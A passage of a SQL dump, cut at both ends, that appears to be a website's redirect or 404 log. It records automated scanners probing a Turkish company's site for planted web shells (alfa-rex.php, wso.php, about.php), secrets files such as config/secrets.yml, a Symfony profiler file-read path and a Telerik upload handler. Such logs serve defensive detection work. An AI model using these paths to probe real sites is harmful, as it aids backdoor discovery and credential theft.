00:00:00',301),(43712,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/alfa-rex.php8',NULL,'','',1,0,'2025-07-28 12:09:55','0000-00-00 00:00:00',301),(43713,'http://3s-technologies.com.tr/tr/evatusmk.php',NULL,'','',2,0,'2025-07-28 12:09:56','0000-00-00 00:00:00',301),(43714,'http://3s-technologies.com.tr/tr/wp-content/themes/vantage/slider/about.php',NULL,'','',1,0,'2025-07-28 12:09:57','0000-00-00 00:00:00',301),(43715,'http://3s-technologies.com.tr/tr/wp-includes/id3/alfa-rex.php8',NULL,'','',2,0,'2025-07-28 12:10:00','0000-00-00 00:00:00',301),(43716,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentythree/assets/alfa-rex.php8',NULL,'','',2,0,'2025-07-28 12:10:01','0000-00-00 00:00:00',301),(43717,'http://3s-technologies.com.tr/tr/wp-content/themes/twentynineteen/inc/alfa-rex.php8',NULL,'','',1,0,'2025-07-28 12:10:01','0000-00-00 00:00:00',301),(43718,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/edit-post/alfa-rex.php',NULL,'','',2,0,'2025-07-28 12:10:02','0000-00-00 00:00:00',301),(43719,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwenty/classes/about.php',NULL,'','',1,0,'2025-07-28 12:10:03','0000-00-00 00:00:00',301),(43720,'http://3s-technologies.com.tr/tr/wp-includes/requests/src/alfa-rex.php8',NULL,'','',1,0,'2025-07-28 12:10:04','0000-00-00 00:00:00',301),(43721,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwenty/assets/js/about.php',NULL,'','',1,0,'2025-07-28 12:10:05','0000-00-00 00:00:00',301),(43722,'http://3s-technologies.com.tr/tr/wp-includes/blocks/paragraph/alfa-rex.php8',NULL,'','',1,0,'2025-07-28 12:10:07','0000-00-00 00:00:00',301),(43723,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/alfa-rex.php',NULL,'','',1,0,'2025-07-28 12:10:08','0000-00-00 00:00:00',301),(43724,'http://3s-technologies.com.tr/tr/wp-content/plugins/woocommerce/lib/alfa-rex.php7',NULL,'','',1,0,'2025-07-28 12:10:08','0000-00-00 00:00:00',301),(43725,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/edit-post/about.php',NULL,'','',2,0,'2025-07-28 12:10:09','0000-00-00 00:00:00',301),(43726,'http://3s-technologies.com.tr/tr/wp-includes/assets/alfa-rex.php8',NULL,'','',1,0,'2025-07-28 12:10:10','0000-00-00 00:00:00',301),(43727,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/parse/about.php',NULL,'','',1,0,'2025-07-28 12:10:11','0000-00-00 00:00:00',301),(43728,'http://3s-technologies.com.tr/tr/wp-content/themes/tripod/woocustomtemplates/alfa-rex.php7',NULL,'','',1,0,'2025-07-28 12:10:12','0000-00-00 00:00:00',301),(43729,'http://3s-technologies.com.tr/tr/wp-includes/js/dist/vendor/about.php',NULL,'','',4,0,'2025-07-28 12:10:13','0000-00-00 00:00:00',301),(43730,'http://3s-technologies.com.tr/tr/wp-includes/images/wlw/alfa-rex.php8',NULL,'','',1,0,'2025-07-28 12:10:14','0000-00-00 00:00:00',301),(43731,'http://3s-technologies.com.tr/tr/wp-content/plugins/woocommerce/src/about.php7',NULL,'','',2,0,'2025-07-28 12:10:14','0000-00-00 00:00:00',301),(43732,'http://3s-technologies.com.tr/tr/wp-includes/ans.php',NULL,'','',2,0,'2025-07-28 12:10:15','0000-00-00 00:00:00',301),(43733,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/block-library/alfa-rex.php8',NULL,'','',2,0,'2025-07-28 12:10:16','0000-00-00 00:00:00',301),(43734,'http://3s-technologies.com.tr/tr/wp-includes/requests/alfa-rex.php',NULL,'','',1,0,'2025-07-28 12:10:17','0000-00-00 00:00:00',301),(43735,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/sunrise/alfa-rex.php',NULL,'','',1,0,'2025-07-28 12:10:18','0000-00-00 00:00:00',301),(43736,'http://3s-technologies.com.tr/tr/wp-includes/js/dist/development/alfa-rex.php',NULL,'','',4,0,'2025-07-28 12:10:19','0000-00-00 00:00:00',301),(43737,'http://3s-technologies.com.tr/tr/wp-includes/css/alfa-rex.php7',NULL,'','',1,0,'2025-07-28 12:10:20','0000-00-00 00:00:00',301),(43738,'http://3s-technologies.com.tr/tr/wp-content/themes/travel-lite/js/alfa-rex.php8',NULL,'','',1,0,'2025-07-28 12:10:20','0000-00-00 00:00:00',301),(43739,'http://3s-technologies.com.tr/tr/wp-includes/id3/alfa-rex.php',NULL,'','',2,0,'2025-07-28 12:10:21','0000-00-00 00:00:00',301),(43740,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/content/alfa-rex.php8',NULL,'','',1,0,'2025-07-28 12:10:22','0000-00-00 00:00:00',301),(43741,'http://3s-technologies.com.tr/tr/wp-content/plugins/woocommerce/src/about.php',NULL,'','',1,0,'2025-07-28 12:10:23','0000-00-00 00:00:00',301),(43742,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/xml/alfa-rex.php',NULL,'','',1,0,'2025-07-28 12:10:24','0000-00-00 00:00:00',301),(43743,'https://3s-technologies.com.tr/tr/signatures/tokens_and_credentials/mailgun.yaml',NULL,'','',1,0,'2025-07-28 14:03:33','0000-00-00 00:00:00',301),(43744,'https://3s-technologies.com.tr/tr/config/secrets.yml',NULL,'','',2,0,'2025-07-28 14:03:33','0000-00-00 00:00:00',301),(43745,'http://3s-technologies.com.tr/tr/file_browser.php',NULL,'','',1,0,'2025-07-28 19:19:21','0000-00-00 00:00:00',301),(43746,'http://3s-technologies.com.tr/tr/.well-known/text.php',NULL,'','',1,0,'2025-07-28 19:19:23','0000-00-00 00:00:00',301),(43747,'http://3s-technologies.com.tr/tr/configure.php',NULL,'','',2,0,'2025-07-28 19:19:29','0000-00-00 00:00:00',301),(43748,'http://3s-technologies.com.tr/tr/bootstrap.php',NULL,'','',29,0,'2025-07-28 19:19:30','0000-00-00 00:00:00',301),(43749,'http://3s-technologies.com.tr/en/env.js',NULL,'','',2,0,'2025-07-29 04:10:36','0000-00-00 00:00:00',301),(43750,'http://3s-technologies.com.tr/en/admin.js',NULL,'','',2,0,'2025-07-29 04:10:37','0000-00-00 00:00:00',301),(43751,'http://3s-technologies.com.tr/en/settings.js',NULL,'','',2,0,'2025-07-29 04:10:38','0000-00-00 00:00:00',301),(43752,'http://3s-technologies.com.tr/en/core.js',NULL,'','',2,0,'2025-07-29 04:10:38','0000-00-00 00:00:00',301),(43753,'http://3s-technologies.com.tr/en/data.js',NULL,'','',2,0,'2025-07-29 04:10:40','0000-00-00 00:00:00',301),(43754,'http://3s-technologies.com.tr/en/file-manager/tinymce',NULL,'','',1,0,'2025-07-30 16:05:48','0000-00-00 00:00:00',301),(43755,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/decode/alfa-rex.php7',NULL,'','',1,0,'2025-07-30 16:42:01','0000-00-00 00:00:00',301),(43756,'http://3s-technologies.com.tr/tr/wp-includes/requests/library/alfa-rex.php7',NULL,'','',1,0,'2025-07-30 16:42:01','0000-00-00 00:00:00',301),(43757,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/alfa-rex.php8',NULL,'','',1,0,'2025-07-30 16:42:03','0000-00-00 00:00:00',301),(43758,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/decode/alfa-rex.php8',NULL,'','',1,0,'2025-07-30 16:42:03','0000-00-00 00:00:00',301),(43759,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/xml/wp-login.php',NULL,'','',1,0,'2025-07-30 16:42:05','0000-00-00 00:00:00',301),(43760,'http://3s-technologies.com.tr/tr/wp-includes/assets/about.php7',NULL,'','',1,0,'2025-07-30 16:42:06','0000-00-00 00:00:00',301),(43761,'http://3s-technologies.com.tr/tr/wp-content/plugins/woocommerce/src/alfa-rex.php7',NULL,'','',1,0,'2025-07-30 16:42:06','0000-00-00 00:00:00',301),(43762,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/parts/alfa-rex.php',NULL,'','',1,0,'2025-07-30 16:42:07','0000-00-00 00:00:00',301),(43763,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/parse/alfa-rex.php',NULL,'','',1,0,'2025-07-30 16:42:08','0000-00-00 00:00:00',301),(43764,'http://3s-technologies.com.tr/tr/wp-content/plugins/woocommerce/lib/alfa-rex.php8',NULL,'','',2,0,'2025-07-30 16:42:08','0000-00-00 00:00:00',301),(43765,'http://3s-technologies.com.tr/tr/wp-content/plugins/recent-facebook-posts/includes/alfa-rex.php8',NULL,'','',1,0,'2025-07-30 16:42:09','0000-00-00 00:00:00',301),(43766,'http://3s-technologies.com.tr/tr/wp-includes/requests/wp-login.php',NULL,'','',1,0,'2025-07-30 16:42:10','0000-00-00 00:00:00',301),(43767,'http://3s-technologies.com.tr/tr/wp-includes/js/imgareaselect/alfa-rex.php8',NULL,'','',3,0,'2025-07-30 16:42:11','0000-00-00 00:00:00',301),(43768,'http://3s-technologies.com.tr/tr/wp-includes/requests/src/alfa-rex.php',NULL,'','',1,0,'2025-07-30 16:42:11','0000-00-00 00:00:00',301),(43769,'http://3s-technologies.com.tr/tr/wp-content/themes/twentynineteen/fonts/alfa-rex.php',NULL,'','',1,0,'2025-07-30 16:42:12','0000-00-00 00:00:00',301),(43770,'http://3s-technologies.com.tr/tr/wp-content/themes/vantage/images/about.php',NULL,'','',1,0,'2025-07-30 16:42:13','0000-00-00 00:00:00',301),(43771,'http://3s-technologies.com.tr/tr/wp-content/plugins/edaewni/index.php',NULL,'','',17,0,'2025-07-30 16:42:13','0000-00-00 00:00:00',301),(43772,'http://3s-technologies.com.tr/tr/wp-includes/js/jquery/alfa-rex.php',NULL,'','',1,0,'2025-07-30 16:42:15','0000-00-00 00:00:00',301),(43773,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwelve/js/alfa-rex.php8',NULL,'','',1,0,'2025-07-30 16:42:15','0000-00-00 00:00:00',301),(43774,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/edit-post/alfa-rex.php8',NULL,'','',1,0,'2025-07-30 16:42:16','0000-00-00 00:00:00',301),(43775,'http://3s-technologies.com.tr/tr/wp-includes/phpmailer/alfa-rex.php7',NULL,'','',1,0,'2025-07-30 16:42:17','0000-00-00 00:00:00',301),(43776,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentyone/alfa-rex.php',NULL,'','',1,0,'2025-07-30 16:42:17','0000-00-00 00:00:00',301),(43777,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/block-editor/alfa-rex.php8',NULL,'','',1,0,'2025-07-30 16:42:18','0000-00-00 00:00:00',301),(43778,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/about.php',NULL,'','',1,0,'2025-07-30 16:42:19','0000-00-00 00:00:00',301),(43779,'http://3s-technologies.com.tr/tr/wp-content/plugins/woocommerce/lib/wp-login.php',NULL,'','',1,0,'2025-07-30 16:42:19','0000-00-00 00:00:00',301),(43780,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentythree/patterns/alfa-rex.php',NULL,'','',1,0,'2025-07-30 16:42:20','0000-00-00 00:00:00',301),(43781,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/skins/about.php',NULL,'','',1,0,'2025-07-30 16:42:24','0000-00-00 00:00:00',301),(43782,'http://3s-technologies.com.tr/tr/wp-content/themes/vantage/snippets/about.php',NULL,'','',1,0,'2025-07-30 16:42:25','0000-00-00 00:00:00',301),(43783,'http://3s-technologies.com.tr/tr/wp-includes/images/about.php7',NULL,'','',1,0,'2025-07-30 16:42:26','0000-00-00 00:00:00',301),(43784,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentythree/styles/about.php',NULL,'','',14,0,'2025-07-30 16:42:26','0000-00-00 00:00:00',301),(43785,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/about.php',NULL,'','',1,0,'2025-07-30 16:42:27','0000-00-00 00:00:00',301),(43786,'http://3s-technologies.com.tr/tr/wp-content/themes/tripod/woocommerce/alfa-rex.php7',NULL,'','',1,0,'2025-07-30 16:42:27','0000-00-00 00:00:00',301),(43787,'http://3s-technologies.com.tr/tr/wp-content/themes/vantage/snippets/alfa-rex.php',NULL,'','',1,0,'2025-07-30 16:42:28','0000-00-00 00:00:00',301),(43788,'http://3s-technologies.com.tr/tr/wp-content/themes/travel-lite/js/about.php',NULL,'','',1,0,'2025-07-30 16:42:29','0000-00-00 00:00:00',301),(43789,'http://3s-technologies.com.tr/tr/.wp/wso.php',NULL,'','',6,0,'2025-07-30 16:42:29','0000-00-00 00:00:00',301),(43790,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/styles/about.php',NULL,'','',1,0,'2025-07-30 16:42:30','0000-00-00 00:00:00',301),(43791,'http://3s-technologies.com.tr/tr/wp-includes/requests/library/wp-login.php',NULL,'','',1,0,'2025-07-30 16:42:32','0000-00-00 00:00:00',301),(43792,'http://3s-technologies.com.tr/tr/wp-content/themes/vantage/inc/alfa-rex.php8',NULL,'','',1,0,'2025-07-30 16:42:33','0000-00-00 00:00:00',301),(43793,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/widgets/alfa-rex.php',NULL,'','',1,0,'2025-07-30 16:42:33','0000-00-00 00:00:00',301),(43794,'http://3s-technologies.com.tr/tr/img/5/radio.php',NULL,'','',13,0,'2025-07-30 16:42:34','0000-00-00 00:00:00',301),(43795,'http://3s-technologies.com.tr/tr/wso-x569.php',NULL,'','',15,0,'2025-07-30 16:42:35','0000-00-00 00:00:00',301),(43796,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentythree/patterns/alfa-rex.php8',NULL,'','',1,0,'2025-07-30 16:42:36','0000-00-00 00:00:00',301),(43797,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/about.php',NULL,'','',2,0,'2025-07-30 16:42:37','0000-00-00 00:00:00',301),(43798,'http://3s-technologies.com.tr/tr/wp-content/themes/twentynineteen/fonts/about.php',NULL,'','',1,0,'2025-07-30 16:42:37','0000-00-00 00:00:00',301),(43799,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/widgets/alfa-rex.php8',NULL,'','',1,0,'2025-07-30 16:42:38','0000-00-00 00:00:00',301),(43800,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ectoplasm/about.php',NULL,'','',25,0,'2025-07-30 16:42:40','0000-00-00 00:00:00',301),(43801,'http://3s-technologies.com.tr/tr/wp-content/plugins/woocommerce/src/wp-login.php',NULL,'','',1,0,'2025-07-30 16:42:41','0000-00-00 00:00:00',301),(43802,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/alfa-rex.php',NULL,'','',3,0,'2025-07-30 16:42:42','0000-00-00 00:00:00',301),(43803,'http://3s-technologies.com.tr/tr/wp-content/themes/twentythirteen/alfa-rex.php8',NULL,'','',1,0,'2025-07-30 16:42:46','0000-00-00 00:00:00',301),(43804,'http://3s-technologies.com.tr/tr/uat/m/.well-known/acme-challenge/zkotynva.php',NULL,'','',2,0,'2025-07-30 16:42:47','0000-00-00 00:00:00',301),(43805,'http://3s-technologies.com.tr/tr/wp-includes/images/media/alfa-rex.php8',NULL,'','',1,0,'2025-07-30 16:42:49','0000-00-00 00:00:00',301),(43806,'http://3s-technologies.com.tr/tr/wp-content/themes/travel-lite/js/alfa-rex.php',NULL,'','',1,0,'2025-07-30 16:42:50','0000-00-00 00:00:00',301),(43807,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/net/alfa-rex.php7',NULL,'','',3,0,'2025-07-30 16:42:51','0000-00-00 00:00:00',301),(43808,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/format-library/alfa-rex.php',NULL,'','',1,0,'2025-07-30 16:42:51','0000-00-00 00:00:00',301),(43809,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentythree/assets/about.php',NULL,'','',1,0,'2025-07-30 16:42:52','0000-00-00 00:00:00',301),(43810,'http://3s-technologies.com.tr/tr/wp-content/themes/twentynineteen/alfa-rex.php',NULL,'','',1,0,'2025-07-30 16:42:53','0000-00-00 00:00:00',301),(43811,'http://3s-technologies.com.tr/tr/wp-content/themes/vantage/languages/alfa-rex.php',NULL,'','',1,0,'2025-07-30 16:42:53','0000-00-00 00:00:00',301),(43812,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/themes/alfa-rex.php',NULL,'','',1,0,'2025-07-30 16:42:54','0000-00-00 00:00:00',301),(43813,'http://3s-technologies.com.tr/tr/wp-content/themes/vantage/loops/alfa-rex.php',NULL,'','',1,0,'2025-07-30 16:42:54','0000-00-00 00:00:00',301),(43814,'http://3s-technologies.com.tr/tr/wp-content/themes/twentynineteen/images/alfa-rex.php8',NULL,'','',1,0,'2025-07-30 16:42:55','0000-00-00 00:00:00',301),(43815,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/alfa-rex.php',NULL,'','',1,0,'2025-07-30 16:42:56','0000-00-00 00:00:00',301),(43816,'http://3s-technologies.com.tr/tr/wp-content/themes/twentyfourteen/images/about.php7',NULL,'','',1,0,'2025-07-30 16:42:57','0000-00-00 00:00:00',301),(43817,'http://3s-technologies.com.tr/tr/wp-content/themes/vantage/loops/alfa-rex.php8',NULL,'','',1,0,'2025-07-30 16:42:57','0000-00-00 00:00:00',301),(43818,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/reusable-blocks/alfa-rex.php',NULL,'','',1,0,'2025-07-30 16:42:58','0000-00-00 00:00:00',301),(43819,'http://3s-technologies.com.tr/tr/wp-includes/css/dir/alfa-rex.php7',NULL,'','',1,0,'2025-07-30 16:43:00','0000-00-00 00:00:00',301),(43820,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/decode/about.php',NULL,'','',1,0,'2025-07-30 16:43:01','0000-00-00 00:00:00',301),(43821,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/wp-login.php',NULL,'','',2,0,'2025-07-30 16:43:01','0000-00-00 00:00:00',301),(43822,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/about.php7',NULL,'','',1,0,'2025-07-30 16:43:02','0000-00-00 00:00:00',301),(43823,'http://3s-technologies.com.tr/tr/wp-content/themes/travel-lite/inc/about.php',NULL,'','',1,0,'2025-07-30 16:43:03','0000-00-00 00:00:00',301),(43824,'http://3s-technologies.com.tr/tr/wp-content/themes/customizr/templates/alfa-rex.php8',NULL,'','',1,0,'2025-07-30 16:43:04','0000-00-00 00:00:00',301),(43825,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/components/alfa-rex.php',NULL,'','',1,0,'2025-07-30 16:43:04','0000-00-00 00:00:00',301),(43826,'http://3s-technologies.com.tr/tr/wp-content/themes/6322062q/about.php',NULL,'','',1,0,'2025-07-30 16:43:05','0000-00-00 00:00:00',301),(43827,'http://3s-technologies.com.tr/tr/wp-content/plugins/woocommerce/lib/about.php7',NULL,'','',1,0,'2025-07-30 16:43:06','0000-00-00 00:00:00',301),(43828,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwenty/about.php',NULL,'','',3,0,'2025-07-30 16:43:07','0000-00-00 00:00:00',301),(43829,'http://3s-technologies.com.tr/tr/wp-content/themes/twentynineteen/inc/about.php',NULL,'','',1,0,'2025-07-30 16:43:08','0000-00-00 00:00:00',301),(43830,'http://3s-technologies.com.tr/tr/wp-content/themes/vantage/fontawesome/about.php',NULL,'','',1,0,'2025-07-30 16:43:09','0000-00-00 00:00:00',301),(43831,'http://3s-technologies.com.tr/tr/wp-admin/css/alfa-rex.php8',NULL,'','',1,0,'2025-07-30 16:43:10','0000-00-00 00:00:00',301),(43832,'http://3s-technologies.com.tr/tr/wp-content/themes/vantage/css/alfa-rex.php',NULL,'','',1,0,'2025-07-30 16:43:11','0000-00-00 00:00:00',301),(43833,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/decode/html/wp-login.php',NULL,'','',1,0,'2025-07-30 16:43:12','0000-00-00 00:00:00',301),(43834,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/alfa-rex.php',NULL,'','',1,0,'2025-07-30 16:43:13','0000-00-00 00:00:00',301),(43835,'http://3s-technologies.com.tr/tr/wp-content/plugins/woocommerce/i18n/alfa-rex.php8',NULL,'','',1,0,'2025-07-30 16:43:14','0000-00-00 00:00:00',301),(43836,'http://3s-technologies.com.tr/tr/wp-includes/js/jquery/about.php',NULL,'','',1,0,'2025-07-30 16:43:14','0000-00-00 00:00:00',301),(43837,'http://3s-technologies.com.tr/tr/wp-admin/includes/rk2.php',NULL,'','',4,0,'2025-07-30 19:50:26','0000-00-00 00:00:00',301),(43838,'http://3s-technologies.com.tr/tr/wp-content/uploads/atomlib.php',NULL,'','',3,0,'2025-07-30 19:51:05','0000-00-00 00:00:00',301),(43839,'http://3s-technologies.com.tr/tr/wp-content/plugins/alfa.php',NULL,'','',4,0,'2025-07-30 19:51:16','0000-00-00 00:00:00',301),(43840,'http://3s-technologies.com.tr/tr/wp-includes/js/codemirror/wp-login.php',NULL,'','',5,0,'2025-07-30 19:51:26','0000-00-00 00:00:00',301),(43841,'http://3s-technologies.com.tr/tr/wp-includes/ixr/about.php7',NULL,'','',1,0,'2025-07-30 19:51:27','0000-00-00 00:00:00',301),(43842,'http://3s-technologies.com.tr/tr/wp-content/themes/info.php',NULL,'','',1,0,'2025-07-30 19:51:28','0000-00-00 00:00:00',301),(43843,'https://3s-technologies.com.tr/tr/app_dev.php/_profiler/open?+--env=dev&file=app/config/parameters.yml',NULL,'https://3s-technologies.com.tr/app_dev.php/_profiler/open?+--env=dev&file=app/config/parameters.yml','',2,0,'2025-07-31 00:18:51','0000-00-00 00:00:00',301),(43844,'https://3s-technologies.com.tr/tr/telerik.web.ui.webresource.axd?type=rau',NULL,'https://3s-technologies.com.tr/Telerik.Web.UI.WebResource.axd?type=rau','',1,0,'2025-07-31 00:21:58','0000-00-00 00:00:00',301),(43845,'https://www.3s-technologies.com.tr/tr/tr',NULL,'','',1,0,'2025-07-31 06:01:26','0000-00-00 00:00:00',301),(43846,'http://3s-technologies.com.tr/tr/composer.php',NULL,'','',33,0,'2025-07-31 06:56:16','0000-00-00 00:00:00',301),(43847,'http://3s-technologies.com.tr/tr/eror.php',NULL,'','',11,0,'2025-07-31 06:56:17','0000-00-00 00:00:00',301),(43848,'http://3s-technologies.com.tr/tr/po.php',NULL,'','',13,0,'2025-07-31 06:56:18','0000-00-00 00:00:00',301),(43849,'http://3s-technologies.com.tr/tr/usage-file.php',NULL,'','',10,0,'2025-07-31 06:56:19','0000-00-00 00:00:00',301),(43850,'http://3s-technologies.com.tr/tr/wp-includes/requests/cookie/alfa-rex.php',NULL,'','',11,0,'2025-07-31 06:56:21','0000-00-00 00:00:00',301),(43851,'http://3s-technologies.com.tr/tr/es.php',NULL,'','',15,0,'2025-07-31 06:56:24','0000-00-00 00:00:00',301),(43852,'http://3s-technologies.com.tr/tr/srf.php',NULL,'','',2,0,'2025-07-31 06:56:25','0000-00-00 00:00:00',301),(43853,'http://3s-technologies.com.tr/tr/gser.php',NULL,'','',3,0,'2025-07-31 06:56:26','0000-00-00 00:00:00',301),(43854,'http://3s-technologies.com.tr/tr/images/cadastro-2.php',NULL,'','',3,0,'2025-07-31 06:56:28','0000-00-00 00:00:00',301),(43855,'http://3s-technologies.com.tr/tr/wp-content/uploads/bootstrap.inc.php',NULL,'','',11,0,'2025-07-31 06:56:29','0000-00-00 00:00:00',301),(43856,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/spidyguuu.php',NULL,'','',3,0,'2025-07-31 06:56:30','0000-00-00 00:00:00',301),(43857,'http://3s-technologies.com.tr/tr/images/m.php',NULL,'','',42,0,'2025-07-31 06:56:31','0000-00-00 00:00:00',301),(43858,'http://3s-technologies.com.tr/tr/wp-includes/jagoan.php',NULL,'','',3,0,'2025-07-31 06:56:33','0000-00-00 00:00:00',301),(43859,'http://3s-technologies.com.tr/tr/images/photo.php',NULL,'','',9,0,'2025-07-31 06:56:34','0000-00-00 00:00:00',301),(43860,'http://3s-technologies.com.tr/tr/wp-includes/compats.php',NULL,'','',9,0,'2025-07-31 06:56:36','0000-00-00 00:00:00',301),(43861,'http://3s-technologies.com.tr/tr/wp-admin/maint/mailer.php',NULL,'','',10,0,'2025-07-31 06:56:37','0000-00-00 00:00:00',301),(43862,'http://3s-technologies.com.tr/tr/images/menu_lan.php',NULL,'','',3,0,'2025-07-31 06:56:40','0000-00-00 00:00:00',301),(43863,'http://3s-technologies.com.tr/tr/wp-admin/includes/headeru.php',NULL,'','',3,0,'2025-07-31 06:56:41','0000-00-00 00:00:00',301),(43864,'http://3s-technologies.com.tr/tr/images/footer.php',NULL,'','',13,0,'2025-07-31 06:56:42','0000-00-00 00:00:00',301),(43865,'http://3s-technologies.com.tr/tr/wp-includes/block-editor.php',NULL,'','',10,0,'2025-07-31 06:56:43','0000-00-00 00:00:00',301),(43866,'http://3s-technologies.com.tr/tr/wp-admin/maint/searchx.php',NULL,'','',3,0,'2025-07-31 06:56:44','0000-00-00 00:00:00',301),(43867,'http://3s-technologies.com.tr/tr/images/career.php',NULL,'','',3,0,'2025-07-31 06:56:44','0000-00-00 00:00:00',301),(43868,'http://3s-technologies.com.tr/tr/wp-content/upgrade/file.php',NULL,'','',17,0,'2025-07-31 06:56:47','0000-00-00 00:00:00',301),(43869,'http://3s-technologies.com.tr/tr/wp-includes/afosul.php',NULL,'','',6,0,'2025-07-31 06:56:49','0000-00-00 00:00:00',301),(43870,'http://3s-technologies.com.tr/tr/images/pushy.php',NULL,'','',3,0,'2025-07-31 06:56:50','0000-00-00 00:00:00',301),(43871,'http://3s-technologies.com.tr/tr/.well-known/zaza.php',NULL,'','',20,0,'2025-07-31 06:56:51','0000-00-00 00:00:00',301),(43872,'http://3s-technologies.com.tr/tr/images/sendme.php',NULL,'','',9,0,'2025-07-31 06:56:52','0000-00-00 00:00:00',301),(43873,'http://3s-technologies.com.tr/tr/wp-admin/images/singlep.php',NULL,'','',11,0,'2025-07-31 06:56:53','0000-00-00 00:00:00',301),(43874,'http://3s-technologies.com.tr/tr/wp-admin/includes/rcfos.php',NULL,'','',3,0,'2025-07-31 06:56:54','0000-00-00 00:00:00',301),(43875,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/cpakk.php',NULL,'','',3,0,'2025-07-31 06:56:56','0000-00-00 00:00:00',301),(43876,'http://3s-technologies.com.tr/tr/wp-content/uploads/2024/alfa.php',NULL,'','',7,0,'2025-07-31 06:56:59','0000-00-00 00:00:00',301),(43877,'http://3s-technologies.com.tr/tr/terminal.php',NULL,'','',13,0,'2025-07-31 06:57:04','0000-00-00 00:00:00',301),(43878,'http://3s-technologies.com.tr/tr/wp-admin/maint/_xfyp.php',NULL,'','',3,0,'2025-07-31 06:57:06','0000-00-00 00:00:00',301),(43879,'http://3s-technologies.com.tr/tr/wp-includes/sim.php',NULL,'','',14,0,'2025-07-31 06:57:09','0000-00-00 00:00:00',301),(43880,'http://3s-technologies.com.tr/tr/wp-includes/pomo/secure.php',NULL,'','',11,0,'2025-07-31 06:57:13','0000-00-00 00:00:00',301),(43881,'http://3s-technologies.com.tr/tr/include/nilmdg/min.php',NULL,'','',3,0,'2025-07-31 06:57:14','0000-00-00 00:00:00',301),(43882,'http://3s-technologies.com.tr/tr/vendor/nikic/php-parser/parser.php',NULL,'','',11,0,'2025-07-31 06:57:15','0000-00-00 00:00:00',301),(43883,'http://3s-technologies.com.tr/tr/wp-includes/wp-includes/capabilities.php',NULL,'','',3,0,'2025-07-31 06:57:16','0000-00-00 00:00:00',301),(43884,'http://3s-technologies.com.tr/tr/wp-includes/wp-includes/atomlib.php',NULL,'','',10,0,'2025-07-31 06:57:17','0000-00-00 00:00:00',301),(43885,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-role.php',NULL,'','',3,0,'2025-07-31 06:57:18','0000-00-00 00:00:00',301),(43886,'http://3s-technologies.com.tr/tr/assets/js/wp-config.php',NULL,'','',10,0,'2025-07-31 06:57:19','0000-00-00 00:00:00',301),(43887,'http://3s-technologies.com.tr/tr/css/font-awesome/scss/wp-login.php',NULL,'','',3,0,'2025-07-31 06:57:20','0000-00-00 00:00:00',301),(43888,'http://3s-technologies.com.tr/tr/.bod/.ll/ss.php',NULL,'','',32,0,'2025-07-31 06:57:21','0000-00-00 00:00:00',301),(43889,'http://3s-technologies.com.tr/tr/wp-admin/maint/item.php',NULL,'','',12,0,'2025-07-31 06:57:24','0000-00-00 00:00:00',301),(43890,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/wp-kaori.php',NULL,'','',4,0,'2025-07-31 06:57:25','0000-00-00 00:00:00',301),(43891,'http://3s-technologies.com.tr/tr/admincontrollerextensionextensionultra.php',NULL,'','',4,0,'2025-07-31 12:45:44','0000-00-00 00:00:00',301),(43892,'http://3s-technologies.com.tr/tr/wp-includesabout.php',NULL,'','',4,0,'2025-07-31 12:45:50','0000-00-00 00:00:00',301),(43893,'http://3s-technologies.com.tr/tr/.well-knownclasswithtostring.php',NULL,'','',4,0,'2025-07-31 12:45:50','0000-00-00 00:00:00',301),(43894,'http://3s-technologies.com.tr/tr/wp-contentpluginsdummyyummywp-signup.php',NULL,'','',4,0,'2025-07-31 12:45:52','0000-00-00 00:00:00',301),(43895,'http://3s-technologies.com.tr/tr/wp-contentthemestwentytwenty404.php',NULL,'','',4,0,'2025-07-31 12:45:53','0000-00-00 00:00:00',301),(43896,'http://3s-technologies.com.tr/tr/.well-knowngecko-litespeed.php',NULL,'','',4,0,'2025-07-31 12:46:00','0000-00-00 